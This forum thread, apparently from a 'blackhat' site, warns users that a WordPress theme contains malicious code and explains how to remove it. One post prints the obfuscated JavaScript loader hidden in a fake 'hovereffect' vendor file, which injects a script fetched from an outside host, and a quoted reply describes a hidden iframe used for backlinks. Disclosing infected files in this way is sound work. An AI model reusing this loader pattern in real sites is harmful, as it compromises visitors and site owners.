Best Blackhat Forum

Pages: 1 2

I can confirm. Don't download, theme is infected with malicious code.

I found malicious code in /wp-content/themes/x/framework/js/vendor/hovereffect-7.0.0.min.js

Code:

var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex6Ax75x71x75x65x72x79x2Ex63x6Fx6Dx2Fx63x6Fx6Dx7​0x61x62x69x6Cx69x74x79x2Ex70x68x70x3F","x72x61x6Ex64x6Fx6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);

Unless there is more that one place with malicious code, removing it worked.

If you also want to remove the bad js call from your site as well, delete the following from /wp-content/themes/x/framework/functions/global/enqueue/scripts.php.

Code:

wp_register_script( 'vend-hovereffect', $get_template_directory_uri . '/framework/js/vendor/hovereffect-7.0.0.min.js', array( 'jquery' ), NULL, true );

Edit: Doing more research shows that hovereffect is not even a thing. Going to http://cherne.net/brian/resources/jquery...ffect.html leads to a 404. If I'm correct, you could just deleted the whole hovereffect-7.0.0.min.js as that does nothing.

Becareful of such themes with iframe embedded. You will get suspended by Amazon if you do.

(05-08-2014 09:52 PM)clawduda Wrote: [ -> ]you are not the only one
there is a hidden iframe .
check the page source of one of your pages
at the end of the sources just before the <body> ends ... you will notice a hidden iframe with display:none pointing to icloudconnected.com

some idiot decided to get backlinks in this way . He took the theme infected it with this code and anyone who uses it will backlink to his website.

ofc the original theme does not have this kind of thing

BTW . does anyone know where that iframe is put in the theme ? so that we can delete it

Pages: 1 2

Pummel

shareone

senoob